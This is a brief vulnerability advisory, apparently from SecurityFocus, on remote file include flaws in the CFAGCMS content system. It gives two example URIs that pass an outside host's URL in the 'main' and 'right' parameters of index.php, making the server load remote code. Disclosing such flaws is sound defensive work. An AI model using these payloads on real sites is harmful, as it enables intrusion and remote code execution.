CFAGCMS 'index.php' Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/cfagcms/themes/default/index.php?main=http://www.example2.com
http://www.example.com/cfagcms/themes/default/index.php?right=http://www.example2.com


 

Privacy Statement
Copyright 2010, SecurityFocus